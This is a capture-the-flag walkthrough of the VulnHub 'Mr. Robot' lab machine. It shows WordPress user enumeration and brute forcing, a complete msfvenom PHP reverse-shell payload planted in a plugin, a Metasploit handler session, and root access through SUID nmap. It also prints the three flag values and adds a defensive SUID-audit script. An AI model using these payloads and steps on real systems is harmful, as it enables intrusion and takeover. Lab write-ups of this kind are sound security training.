Mr. Robot – VulnHub

In this CTF write-up I am going to give you a walkthrough of “Mr. Robot”, a vulnerable machine designed for security enthusiasts to improve their vulnerability assessment and penetration testing skills.
You can download this machine from the VulnHub link provided.

Level: Intermediate

Objective: Find three hidden keys.

WalkThrough:

1. Start with an nmap scan: nmap 10.10.10.11

The nmap results give us some important information:
3 open ports and an Apache server running.

Now let's use nikto to enumerate the web service.


2. nikto -h 10.10.10.11

Nikto gave us some interesting information, such as robots.txt and a WordPress installation.


3. Now let's open robots.txt

Let's open key-1-of-3.txt

Now let's check what's in fsocity.dic
root@kali:~# wget http://10.10.10.11/fsocity.dic
--2019-01-02 00:19:39--  http://10.10.10.11/fsocity.dic
Connecting to 10.10.10.11:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7245381 (6.9M) [text/x-c]
Saving to: 'fsocity.dic'
fsocity.dic               100%[====================================>]   6.91M  --.-KB/s    in 0.1s
2019-01-02 00:19:39 (47.7 MB/s) - 'fsocity.dic' saved [7245381/7245381]
It seems to be a wordlist.


4. Now it's time to check the WordPress site and try to log in.
I tried multiple common combinations like admin-admin, root-root, etc.
As I know about the TV series Mr. Robot and its lead character Elliot, I tried elliot-elliot as credentials, and bingo!
I got "ERROR: The password you entered for the username elliot is incorrect."
That WordPress error message confirms that elliot is a valid username. Now let's remove the duplicate entries from the fsocity.dic wordlist and use WPScan to brute-force the password for elliot with the fsocity_cleaned.txt wordlist:
root@kali:~# sort -u fsocity.dic > fsocity_cleaned.txt
root@kali:~# wpscan --url http://10.10.10.11/ --wordlist /root/fsocity_cleaned.txt --username elliot


5. Log in using the credentials and upload a payload to get a reverse_tcp shell

root@kali:~# msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.10.5 lport=4444 -f raw
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 946 bytes
/*<?php /**/ error_reporting(0); $ip = '10.10.10.5'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } elseif (($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } elseif (($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } else { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; eval($b); die();

Copy this payload into any editable plugin.


6. Open the Metasploit console (msfconsole) and set up the handler
msf >
msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 10.10.10.5
lhost => 10.10.10.5
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > exploit


7. Activate the plugin in which you uploaded the payload.

[*] Started reverse TCP handler on 10.10.10.5:4444
[*] Starting the payload handler…
[*] Sending stage (33721 bytes) to 10.10.10.11
[*] Meterpreter session 1 opened (10.10.10.5:4444 -> 10.10.10.11:44555) at 2019-01-02 02:00:51 -0500

Now we have an MD5 hash, and checking it online gives “abcdefghijklmnopqrstuvwxyz”.

To get an interactive terminal, type: python -c 'import pty; pty.spawn("/bin/bash")'


8. Now we have to get root to get the 3rd key.
For this, run the following command:
robot@linux:~$ find / -user root -perm -4000
find / -user root -perm -4000
/bin/ping
/bin/umount
/bin/su
find: `/etc/ssl/private': Permission denied
/usr/bin/passwd
/usr/bin/gpasswd
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
find: `/opt/bitnami/mysql/data/mysql': Permission denied

The list includes /usr/local/bin/nmap with the SUID bit set, and we can use nmap's interactive mode to get a root shell.
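As an added defender-side check (not part of the original write-up): the audit below takes the raw output of the find command above, drops find's permission-denied noise, and reports SUID-root binaries that are not in a baseline, treating paths under locally administered prefixes such as /usr/local as the most urgent. The baseline allowlist and the prefix list are constructed assumptions, not a distro manifest.

```python
# Constructed allowlist of SUID binaries expected on this host; a real
# baseline comes from a clean install or package manifests.
BASELINE = {
    "/bin/ping", "/bin/umount", "/bin/su", "/bin/mount",
    "/usr/bin/passwd", "/usr/bin/gpasswd", "/usr/bin/sudo",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/eject/dmcrypt-get-device",
}
# Package managers do not own these prefixes: a SUID file here was put
# there by hand (admin or attacker) and gets the highest priority.
LOCAL_PREFIXES = ("/usr/local/", "/opt/", "/home/", "/tmp/", "/var/tmp/")


def parse_find_output(text):
    """Return absolute paths from find output; 'find: ... Permission
    denied' lines do not start with '/' and are dropped."""
    return [ln.strip() for ln in text.splitlines() if ln.strip().startswith("/")]


def audit_suid(text, baseline=BASELINE):
    """Map each SUID path to 'ok', 'unexpected' or 'unexpected-local'."""
    findings = {}
    for path in parse_find_output(text):
        if path in baseline:
            findings[path] = "ok"
        elif path.startswith(LOCAL_PREFIXES):
            findings[path] = "unexpected-local"
        else:
            findings[path] = "unexpected"
    return findings


# Sample input constructed from the shape of the write-up's find output.
SAMPLE = """\
/bin/ping
/bin/umount
/bin/su
find: `/etc/ssl/private': Permission denied
/usr/bin/passwd
/usr/bin/gpasswd
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
find: `/opt/bitnami/mysql/data/mysql': Permission denied
"""

if __name__ == "__main__":
    for path, verdict in sorted(audit_suid(SAMPLE).items()):
        if verdict != "ok":
            print(verdict, path)
```

On the sample above the only finding is /usr/local/bin/nmap, flagged as unexpected-local; run the same check periodically and diff against the previous run to catch newly added SUID files.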

Finally we were able to achieve all 3 keys:
Key 1: 073403c8a58a1f80d943455fb30724b9
Key 2: 822c73956184f694993bede3eb39f959
Key 3: 04787ddef27c3dee1ee161b21670b4e4

 
